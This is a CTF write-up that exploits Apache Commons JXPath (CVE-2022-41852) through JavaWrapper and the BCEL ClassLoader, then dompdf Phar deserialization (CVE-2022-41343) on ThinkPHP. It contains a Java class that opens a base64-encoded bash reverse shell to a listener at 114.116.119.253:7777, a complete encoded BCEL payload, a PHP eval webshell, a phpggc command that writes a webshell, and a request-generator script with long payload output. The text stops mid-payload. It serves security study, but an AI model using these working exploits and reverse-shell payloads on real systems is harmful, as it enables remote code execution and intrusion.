ezjxpath

CVE-2022-41852

Other people's writeups describe this as the unintended solution from TCTF.

At first glance this is a known CVE (Apache Commons JXPath evaluates attacker-controlled XPath extension-function calls, which gives code execution), but every payload you can find on Google has been blacklisted by the challenge, so you have to build your own chain.

[screenshot]

The challenge hands us something unidentified, so download the jar and look inside.

[screenshot]

This is where the exploitable call sits: the user-supplied string is passed straight to JXPathContext.getValue().

The payloads you can find online:

import org.apache.commons.jxpath.JXPathContext;

// 1. Runtime.exec through JXPath's extension-function syntax
public static void main(String[] args) {
    try {
        JXPathContext context = JXPathContext.newContext(null);
        context.getValue("exec(java.lang.Runtime.getRuntime(), 'calc')");
    } catch (Exception e) {
        e.printStackTrace();
    }
}

// 2. Spring ClassPathXmlApplicationContext loading a remote bean definition
public static void main(String[] args) {
    try {
        JXPathContext context = JXPathContext.newContext(null);
        context.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:9000/spring-Evil.xml\")");
    } catch (Exception e) {
        e.printStackTrace();
    }
}

// 3. JNDI lookup through the static InitialContext.doLookup
try {
    JXPathContext context = JXPathContext.newContext(null);
    context.getValue("javax.naming.InitialContext.doLookup('rmi://127.0.0.1:1099/1u560y')");
} catch (Exception e) {
    e.printStackTrace();
}

These are the three common ones, and all three are blacklisted.

[screenshot]

So we have to find a chain of our own.

That means looking elsewhere. After the contest it clicked that many of the unintended TCTF solutions went through static methods, and a static method call is exactly what JXPath lets us make here. The candidate is com.sun.org.apache.bcel.internal.util.JavaWrapper, which ships in rt.jar (so this is a JDK 8 target). Its _main method looks like this:

public static void _main(String[] argv) throws Exception {
    /* Expects class name as first argument, other arguments are by-passed. */
    if (argv.length == 0) {
        System.out.println("Missing class name.");
        return;
    }

    String class_name = argv[0];
    String[] new_argv = new String[argv.length - 1];
    System.arraycopy(argv, 1, new_argv, 0, new_argv.length);

    JavaWrapper wrapper = new JavaWrapper();
    wrapper.runMain(class_name, new_argv);
}

The real work happens in runMain; class_name and new_argv are the class name and its arguments:

public void runMain(String class_name, String[] argv) throws ClassNotFoundException
{
    Class cl = loader.loadClass(class_name);
    Method method = null;

    try {
        method = cl.getMethod("_main", new Class[] { argv.getClass() });

        /* Method _main is sane ? */
        int m = method.getModifiers();
        Class r = method.getReturnType();

        if(!(Modifier.isPublic(m) && Modifier.isStatic(m)) ||
           Modifier.isAbstract(m) || (r != Void.TYPE))
            throw new NoSuchMethodException();
    } catch(NoSuchMethodException no) {
        System.out.println("In class " + class_name +
                           ": public static void _main(String[] argv) is not defined");
        return;
    }

    try {
        method.invoke(null, new Object[] { argv });
    } catch(Exception ex) {
        ex.printStackTrace();
    }
}

loader.loadClass(class_name) is plainly a class-loading sink, and on closer inspection loader is a BCEL ClassLoader (com.sun.org.apache.bcel.internal.util.ClassLoader). That loader treats any class name containing the $$BCEL$$ prefix as an encoded class file: it decodes (and gunzips) the rest of the name into bytecode and defines the class from it, so no file on disk and no remote server are needed.

[screenshot]

Time to revisit dynamic class loading, using this challenge as the excuse.

The topic being tested here is Java security: the BCEL ClassLoader.

Since that is what the challenge hinges on, it deserves a dedicated writeup on the BCEL ClassLoader.

Back to JavaWrapper: after loadClass returns, it invokes the loaded class's public static void _main(String[]), so all we need is a class with that exact signature.

The malicious class:

package org.example;

import java.io.IOException;

// JavaWrapper.runMain looks for exactly this signature: public static void _main(String[])
public class calc {
    public static void _main(String[] argv) throws IOException {
        // base64 of a bash reverse shell to the listener at 114.116.119.253:7777
        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTE2LjExOS4yNTMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
    }

    public static void main(String[] args) {

    }
}

[screenshot]

Next, turn its bytecode into the $$BCEL$$ string the loader expects:

package org.example;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

public class App
{
    public static void main( String[] args ) throws Exception {
        // Read calc's bytecode from the classpath and encode it the way BCEL's
        // ClassLoader expects: gzip, then BCEL's '$'-escaped text encoding
        JavaClass javaClass = Repository.lookupClass(calc.class);
        String code = Utility.encode(javaClass.getBytes(), true);
        System.out.println("$$BCEL$$" + code);
        // Sanity check: the BCEL ClassLoader defines the class straight from the string
        Class.forName("$$BCEL$$" + code, true, new ClassLoader());
    }
}

Finally, send the payload:

context.getValue("com.sun.org.apache.bcel.internal.util.JavaWrapper._main(split('$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmR$5dO$TA$U$3dC$b7$5d$ba$ae$C$c5$ef$_$aab$y$d2$ba$R$88$n$a91i$9ab4$db$WiS$82$3e$98$e92$d9N$d3$dd$r$bb$db$ba$80$fc$u_$d4$f8$e0$P$f0G$Z$ef$b4$84$Sa$92$993s$ee$99s$e7$de$cc$9f$bf$bf$7e$Dx$89$a7$G2$b8m$e0$O$ee$ce$e2$9e$c2$fb$3a$k$e8x$c8$90y$z$7d$Z$bfaH$VV$3a$MZ5$d8$X$Ms$b6$f4Ec$e8uE$d8$e6$dd$B19$3bp$f8$a0$c3C$a9$ce$a7$a4$W$f7d4$8e$85$ae$r$S$ee$j$M$84E2$a7$cc$90$fe$ecq$e93$dc$y$7c$b2$fb$7c$c4$ad$B$f7$5d$ab$V$87$d2w$cb$e3T$3ctG$M$8b$97$84$Z$8cZ$e2$88$83X$G$7e$a4c$89$c4$T3u$87$S$g$ad$60$Y$3abK$aaGdU$c2$X$ca$c3$84$8eY$jy$T$8f$f0$98$81wy$d4$cb$97$9c$fc$b1pzAq$cf$db$3a$e2$d5J$cc$5b$95$d5$f7$b22$fa$f8$b6$b3f$af$ef$f4$9d$eafRo$7f$Y$d6$db$b55$bb_K$9a$ad$8d$c3F$bb$3ej$i9$eb$8d$c3$ca$97m$b9$97$9c$7c$3d$s3$f1j$a3X$da$9f$ec$7b$c5$92$3c1$f1$E$cb$M$f3$ff$97O$d4$b4$a6f$b7$_$9c$98$K$jS2$b0$de5$cf$8acX$98$Kw$86$7e$y$3d$aa$c8pE$7cv$b8QX$b1$_h$a8C$9aH$E$rzV$b8$a4$bb$e7$a8$ed0pD$U$95$a9$ri$fa$Ej$a4$c0T$a3h$cd$d2$c9$od$84$e9$e7$3f$c0$be$d1f$G$G$ad$99$J$89$x$b4$9a$a7$7b$TW$J$b3$b8$869R$a9$cb$9b$84$wf$fc$c4L$$$f5$j$da$ee$d4$c1$m$E$r$caR$aa$a9$8b$81y$y$Q$e6hj$c4$yR$fc$3a$f9M$k$b3JS$a9$$$3c$c4$3cgA$3d$Z$5b$d0$df$g$abn$fd$D$f9$9fP$X$e8$C$A$A',','))");

split() is used to build the array because _main only accepts a String[]: with no namespace prefix, JXPath resolves split(s, ',') as a method call on its first argument, i.e. String.split(","), and since the BCEL encoding only ever emits [A-Za-z0-9_$], the result is a one-element array holding the whole $$BCEL$$ string.

[screenshot]

[screenshot]

Once loadClass returns the malicious class, JavaWrapper invokes its _main. The full path from the challenge is: the controlled string enters context.getValue(), JXPath resolves JavaWrapper._main as a static extension function and calls it reflectively via invoke, JavaWrapper's BCEL loader defines our class from the $$BCEL$$ string, and _main runs the command.
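The $$BCEL$$ string is opaque on the wire, which matters both when building a payload and when triaging one that shows up in a log. The following is an added example, not code from the original post or from BCEL: a Python re-implementation of BCEL's Utility.encode/decode escaping (gzip, then '$'-escaped text, using BCEL's own ASCII-only identifier test) plus a small constant-pool walker that recovers the class name and string constants from the decoded class file. The sample class bytes are constructed inline (a header and constant pool only, not a loadable class), and the class name org.example.calc and the string 'bash -c id' inside it are placeholders.

```python
"""Decode/encode BCEL's $$BCEL$$ class-name encoding (the format
com.sun.org.apache.bcel.internal.util.ClassLoader accepts) and pull the class
name and string constants out of the resulting class file, so a captured
payload can be inspected without a JVM."""
import gzip
import struct

# BCEL's 48 "free" escape characters: byte n < 48 is written as '$' + _FREE[n]
_FREE = ([chr(c) for c in range(ord('A'), ord('Z') + 1)]
         + [chr(c) for c in range(ord('g'), ord('z') + 1)]
         + ['$', '_'])
_MAP_CHAR = {ch: i for i, ch in enumerate(_FREE)}
PREFIX = '$$BCEL$$'


def _is_ident(b: int) -> bool:
    """BCEL's own ASCII-only isJavaIdentifierPart: [A-Za-z0-9_]."""
    return 0x61 <= b <= 0x7a or 0x41 <= b <= 0x5a or 0x30 <= b <= 0x39 or b == 0x5f


def bcel_encode(class_bytes: bytes, compress: bool = True) -> str:
    """Mirror of Utility.encode(bytes, compress): gzip, then escape."""
    data = gzip.compress(class_bytes, mtime=0) if compress else class_bytes
    out = []
    for b in data:
        if _is_ident(b):
            out.append(chr(b))
        elif b < len(_FREE):
            out.append('$' + _FREE[b])          # short escape for bytes 0..47
        else:
            out.append('$%02x' % b)             # two-digit lowercase hex escape
    return PREFIX + ''.join(out)


def bcel_decode(name: str) -> bytes:
    """Mirror of Utility.decode: unescape, then gunzip if the bytes are gzip."""
    idx = name.find(PREFIX)
    body = name[idx + len(PREFIX):] if idx >= 0 else name
    out = bytearray()
    i = 0
    while i < len(body):
        c = body[i]
        if c != '$':
            out.append(ord(c))
            i += 1
        elif body[i + 1] in '0123456789abcdef':
            out.append(int(body[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(_MAP_CHAR[body[i + 1]])
            i += 2
    raw = bytes(out)
    return gzip.decompress(raw) if raw[:2] == b'\x1f\x8b' else raw


def class_info(cls: bytes):
    """Walk the constant pool; return (this_class name, all CONSTANT_Utf8 strings)."""
    if cls[:4] != b'\xca\xfe\xba\xbe':
        raise ValueError('not a class file')
    (count,) = struct.unpack('>H', cls[8:10])
    pool = [None] * count
    pos, i = 10, 1
    while i < count:
        tag = cls[pos]
        pos += 1
        if tag == 1:                                   # Utf8
            (ln,) = struct.unpack('>H', cls[pos:pos + 2])
            pool[i] = ('utf8', cls[pos + 2:pos + 2 + ln].decode('utf-8', 'replace'))
            pos += 2 + ln
        elif tag in (7, 8, 16, 19, 20):                # Class, String, MethodType, Module, Package
            (ref,) = struct.unpack('>H', cls[pos:pos + 2])
            pool[i] = ('ref', ref)
            pos += 2
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18):     # 4-byte entries
            pos += 4
        elif tag in (5, 6):                            # Long/Double occupy two slots
            pos += 8
            i += 1
        elif tag == 15:                                # MethodHandle
            pos += 3
        else:
            raise ValueError('unknown constant pool tag %d' % tag)
        i += 1
    (this_class,) = struct.unpack('>H', cls[pos + 2:pos + 4])   # skip access_flags
    name = pool[pool[this_class][1]][1].replace('/', '.')
    strings = [e[1] for e in pool if e and e[0] == 'utf8']
    return name, strings


def sample_class() -> bytes:
    """Constructed minimal class file (header + constant pool only) used as input."""
    def utf8(s: bytes) -> bytes:
        return b'\x01' + struct.pack('>H', len(s)) + s
    pool = (utf8(b'org/example/calc') + b'\x07\x00\x01'
            + utf8(b'java/lang/Object') + b'\x07\x00\x03'
            + utf8(b'bash -c id'))
    return (b'\xca\xfe\xba\xbe\x00\x00\x00\x34' + struct.pack('>H', 6) + pool
            + b'\x00\x21\x00\x02\x00\x04' + b'\x00\x00' * 4)


if __name__ == '__main__':
    encoded = bcel_encode(sample_class())
    print(encoded[:40], '...')
    print(class_info(bcel_decode(encoded)))
```

Feed bcel_decode() a string captured from a request to see which class it defines and which command strings it carries; bcel_encode() on a real .class file produces a name that JavaWrapper._main (via the BCEL ClassLoader) will accept.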

pdf_converter_revenge

Challenge

[screenshot]

The provided source exposes a path and reveals the ThinkPHP version; the unintended solution is to fire the public ThinkPHP v5.0.21 RCE PoC directly.

Now the intended solution.

Topic: Phar deserialization

[screenshot]

The dependency list includes dompdf.

CVE-2022-41343 - RCE via Phar deserialization

Searching by the version number turns up analyses of this bug:

DomPDF library deserialization RCE vulnerability analysis (DomPDF库反序列化RCE漏洞分析)

These articles are useful references.

Vulnerable code

<?php
public function registerFont($style, $remoteFile, $context = null)
{
    [...]
    $entry[$styleString] = $localFile;

    // Download the remote file
    [$protocol] = Helpers::explode_url($remoteFile);
    $allowed_protocols = $this->options->getAllowedProtocols();
    if (!array_key_exists($protocol, $allowed_protocols)) {
        Helpers::record_warnings(E_USER_WARNING, "Permission denied on $remoteFile. The communication protocol is not supported.", __FILE__, __LINE__);
        // no return: execution continues even with an unsupported protocol
    }

    foreach ($allowed_protocols[$protocol]["rules"] as $rule) {
        [$result, $message] = $rule($remoteFile);
        if ($result !== true) {
            Helpers::record_warnings(E_USER_WARNING, "Error loading $remoteFile: $message", __FILE__, __LINE__);
            // no return here either: a failed rule only records a warning
        }
    }

    list($remoteFileContent, $http_response_header) = @Helpers::getFileContent($remoteFile, $context);
    if ($remoteFileContent === null) {
        return false;
    }
    [...]
}

[screenshot]

The bug is in this stretch: neither failed check aborts. An unsupported protocol only records a warning through Helpers::record_warnings, and a rule that returns something other than true only records a warning as well; there is no return after if ($result !== true). Execution therefore falls through to getFileContent with whatever protocol the attacker supplied, including the star of this challenge, phar://.

public static function getFileContent($uri, $context = null, $offset = 0, $maxlen = null)
{
    $content = null;
    $headers = null;
    [$protocol] = Helpers::explode_url($uri);
    $is_local_path = in_array(strtolower($protocol), ["", "file://", "phar://"], true);
    $can_use_curl = in_array(strtolower($protocol), ["http://", "https://"], true);

    set_error_handler([self::class, 'record_warnings']);

    try {
        if ($is_local_path || ini_get('allow_url_fopen') || !$can_use_curl) {
            if ($is_local_path === false) {
                $uri = Helpers::encodeURI($uri);
            }
            if (isset($maxlen)) {
                $result = file_get_contents($uri, false, $context, $offset, $maxlen);
            } else {
                $result = file_get_contents($uri, false, $context, $offset);
            }
            if ($result !== false) {
                $content = $result;
            }
            if (isset($http_response_header)) {
                $headers = $http_response_header;
            }

        } elseif ($can_use_curl && function_exists('curl_exec')) {
            [...]
        }
    } finally {
        restore_error_handler();
    }

    return [$content, $headers];
}

[...]

[screenshot]

This is where the phar deserialization is triggered.

file_get_contents on a phar:// URI makes PHP open the archive, and opening a phar parses its manifest and unserialize()s the metadata stored there: the classic phar deserialization trigger. Since the challenge runs on ThinkPHP 5, the TP5 deserialization gadget chains apply.
First we need a valid font file, because dompdf validates the downloaded data as a font before saving it, so the phar has to be a font/phar polyglot. Generate the font with the following script:

The script comes from the analysis article above.

#!/usr/bin/env python3
# Generates a minimal but valid TTF with FontForge; its bytes become the
# polyglot's prefix so dompdf accepts the upload as a font.
import fontforge
import os
import sys
import tempfile

def main():
    sys.stdout.buffer.write(do_generate_font())

def do_generate_font() -> bytes:
    fd, fn = tempfile.mkstemp(suffix=".ttf")
    os.close(fd)
    font = fontforge.font()
    font.copyright = "DUMMY FONT"
    font.generate(fn)
    with open(fn, "rb") as f:
        res = f.read()
    os.unlink(fn)
    return res

if __name__ == "__main__":
    main()

You will most likely get an error that the fontforge module cannot be found; apt-get install python3-fontforge fixes that.
Then generate the font:

[screenshot]

Redirect the script's output into font.ttf.

Next, use phpggc to generate the payload.

PHPGGC is a tool that generates serialized payloads for the known gadget chains of the popular frameworks, effectively an armoury for deserialization bugs; knowing it well saves a lot of work on deserialization challenges.

./phpggc -l lists the available chains

[screenshot]

Pick the chain matching the challenge's ThinkPHP version.

./phpggc ThinkPHP/FW1 <remote_path> <local_path>
Usage as above: remote_path is where the file gets written on the target, local_path is your shell file.
Note that on TP5 you want to write under the public folder, because that is the only folder we can reach over the web.
The shell I prepared:

<?php eval($_POST[1]);?>

[screenshot]

The command actually used here is the ThinkPHP/RCE2 chain, emitted as a phar with the font as its prefix (-pp) so the result is a font/phar polyglot:

php -d phar.readonly=0 phpggc ThinkPHP/RCE2 system "echo '<?php system($_GET[0]); ?>' > /var/www/html/public/mochu7.php" -p phar -pp font.ttf -o font-polyglot.phar

A check worth doing before sending this: inside double quotes the shell expands $_GET[0] to an empty string before phpggc ever sees it, so the serialized command becomes echo '<?php system(); ?>' > ... (decoding the manifest in the script output below shows exactly that). Escape it as \$_GET[0] or wrap the whole command in single quotes. The target filename also differs between this command (mochu7.php) and the output and final step (1.php); use one name consistently.

[screenshot]

Then generate the two requests with the following script:

#!/usr/bin/env python3
import argparse
import hashlib
import base64
import urllib.parse
import os

PAYLOAD_TEMPLATE_URL_ENCODED = '''
<style>@font-face+{+font-family:'exploit';+src:url('%s');+font-weight:'normal';+font-style:'normal';}</style>
'''
PAYLOAD_TEMPLATE = '''
<style>
@font-face {
    font-family:'exploit';
    src:url('%s');
    font-weight:'normal';
    font-style:'normal';
}
</style>
'''

def get_args():
    parser = argparse.ArgumentParser(prog="generate_payload.py",
        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
        epilog='''
This script will generate payloads for CVE-2022-41343
''')
    parser.add_argument("file", help="Polyglot File")
    parser.add_argument("-p", "--path", default="/var/www/", help="Base path to vendor directory (Default = /var/www/)")
    args = parser.parse_args()
    return args

def main():
    args = get_args()
    file = args.file.strip()
    path = args.path.strip()
    if os.path.exists(file):
        generate_payloads(file, path)
    else:
        print("ERROR: File doesn't exist.")

def generate_payloads(file, path):
    with open(file, "rb") as f:
        fc = f.read()
    b64 = base64.b64encode(fc)
    data_uri_pure = "data:text/plain;base64,%s" % b64.decode()
    data_uri_double_encoded = "data:text/plain;base64,%s" % urllib.parse.quote_plus(urllib.parse.quote_plus(b64.decode()))
    # The original author double URL-encodes the data URI, but the server decodes it once
    # on receipt, so the string dompdf actually hashes is the once-decoded one. Decode once
    # before computing the md5, otherwise the computed filename will not match.
    md5 = hashlib.md5(urllib.parse.unquote(data_uri_double_encoded).encode()).hexdigest()
    phar_uri = "phar://%s/vendor/dompdf/dompdf/lib/fonts/exploit_normal_%s.ttf##" % (path, md5)
    req1_enc = PAYLOAD_TEMPLATE_URL_ENCODED % data_uri_double_encoded
    req2_enc = PAYLOAD_TEMPLATE_URL_ENCODED % urllib.parse.quote_plus(phar_uri)
    req1_pure = PAYLOAD_TEMPLATE % data_uri_double_encoded
    req2_pure = PAYLOAD_TEMPLATE % phar_uri
    print("====== REQUEST 1 ENCODED =======")
    print(req1_enc)
    print("====== REQUEST 2 ENCODED =======")
    print(req2_enc)
    print("====== REQUEST 1 NOT ENCODED =======")
    print(req1_pure)
    print("====== REQUEST 2 NOT ENCODED =======")
    print(req2_pure)

if __name__ == "__main__":
    main()

python 1.py -p "/var/www/html" font-polyglot.phar

[screenshot]

The script prints:
====== REQUEST 1 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('data:text/plain;base64,UHJvZ3JhbSByb290OiAvdXNyCldhcm5pbmc6IEZvbnQgY29udGFpbmVkIG5vIGdseXBocwrvv73vv706Y3Z0ICF5Z2FzcO%252B%252Fve%252B%252FvWdseWY977%252B977%252B9PmFwCiAgICAgICAgICAgICAgICAgICAgICAgVGhlYWQhRe%252B%252Fve%252B%252Fve%252B%252FvTZoaGVhICRobXR477%252B9Ie%252B%252FvQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvY2EqbWF4cEc5OCBuYW1l77%252B9IylGYO%252B%252FvXBvc3Tvv73vv70yRCLvv712Tl8877%252B9CiAgICAgICAg77%252B977%252B9bkvvv73vv71uS%252B%252B%252FvSEq77%252B9Wu%252B%252Fve%252B%252FvUAu77%252B977%252B977%252B977%252B977%252B977%252B977%252B977%252B9MVBmRWTvv73vv73vv70g77%252B9OFrvv70gbCFNNOKWku%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvSF5KioqISrvv70u77%252B9Lzzvv73vv70y77%252B977%252B9PO%252B%252Fve%252B%252FvTLvv70vPO%252B%252Fve%252B%252FvTLvv73vv70877%252B977%252B9MjMhJzMjISAgICAgIO%252B%252Fve%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvWYhWO%252B%252FvQogICAgICAgIDVPJe%252B%252FvSAgICDvv70gICAgICAgKyAgICAgICAgICAgICAgICEgICAgICAgPyAgICAgICBKVyAgICAgIO%252B%252FvSAgICAgICDvv70gICBEVU1NWSBGT05URFVNTVkgRk9OVFVudGl0bGVkMVVudGl0bGVkMVJlZ3VsYXJSZWd1bGFyRm9udEZvcmdlIDIuMCA6IFVudGl0bGVkMSA6IDI2LTQtMjAyM0ZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyNi00LTIwMjNVbnRpdGxlZDFVbnRpdGxlZDFWZXJzaW9uIDAwMS4wMDBWZXJzaW9uIDAwMS4wMDBVbnRpdGxlZDFVbnRpdGxlZDHvv73vv70y77%252B977%252B977%252B977%252B977%252B9de%252B%252FvW5L77%252B977%252B9bkvvv70KPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%252BDQpVCgAAAQAAABEAAAABAAAAAAAfCgAATzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NTp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7YjowO3M6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpb
mtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjU0OiJlY2hvICc8P3BocCBzeXN0ZW0oKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvMS5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6Mjp7aTowO3M6Mjoibm8iO2k6MTtzOjM6IjEyMyI7fX1zOjk6IgAqAHBhcmVudCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo1NDoiZWNobyAnPD9waHAgc3lzdGVtKCk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljLzEucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6O
DoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NTQ6ImVjaG8gJzw%252FcGhwIHN5c3RlbSgpOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy8xLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fX0IAAAAdGVzdC50eHQEAAAAthRJZAQAAAAMfn%252FYpAEAAAAAAAB0ZXN022l2ia1yjzHI4j9%252F%252FNeso0pc1gcCAAAAR0JNQg%253D%253D');+font-weight:'normal';+font-style:'normal';}</style>

====== REQUEST 2 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fvendor%2Fdompdf%2Fdompdf%2Flib%2Ffonts%2Fexploit_normal_da94a27b825aeca64e86b19a3972972d.ttf%23%23');+font-weight:'normal';+font-style:'normal';}</style>

====== REQUEST 1 NOT ENCODED =======

<style>
@font-face {
font-family:'exploit';
src:url('data:text/plain;base64,UHJvZ3JhbSByb290OiAvdXNyCldhcm5pbmc6IEZvbnQgY29udGFpbmVkIG5vIGdseXBocwrvv73vv706Y3Z0ICF5Z2FzcO%252B%252Fve%252B%252FvWdseWY977%252B977%252B9PmFwCiAgICAgICAgICAgICAgICAgICAgICAgVGhlYWQhRe%252B%252Fve%252B%252Fve%252B%252FvTZoaGVhICRobXR477%252B9Ie%252B%252FvQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvY2EqbWF4cEc5OCBuYW1l77%252B9IylGYO%252B%252FvXBvc3Tvv73vv70yRCLvv712Tl8877%252B9CiAgICAgICAg77%252B977%252B9bkvvv73vv71uS%252B%252B%252FvSEq77%252B9Wu%252B%252Fve%252B%252FvUAu77%252B977%252B977%252B977%252B977%252B977%252B977%252B977%252B9MVBmRWTvv73vv73vv70g77%252B9OFrvv70gbCFNNOKWku%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvSF5KioqISrvv70u77%252B9Lzzvv73vv70y77%252B977%252B9PO%252B%252Fve%252B%252FvTLvv70vPO%252B%252Fve%252B%252FvTLvv73vv70877%252B977%252B9MjMhJzMjISAgICAgIO%252B%252Fve%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvWYhWO%252B%252FvQogICAgICAgIDVPJe%252B%252FvSAgICDvv70gICAgICAgKyAgICAgICAgICAgICAgICEgICAgICAgPyAgICAgICBKVyAgICAgIO%252B%252FvSAgICAgICDvv70gICBEVU1NWSBGT05URFVNTVkgRk9OVFVudGl0bGVkMVVudGl0bGVkMVJlZ3VsYXJSZWd1bGFyRm9udEZvcmdlIDIuMCA6IFVudGl0bGVkMSA6IDI2LTQtMjAyM0ZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyNi00LTIwMjNVbnRpd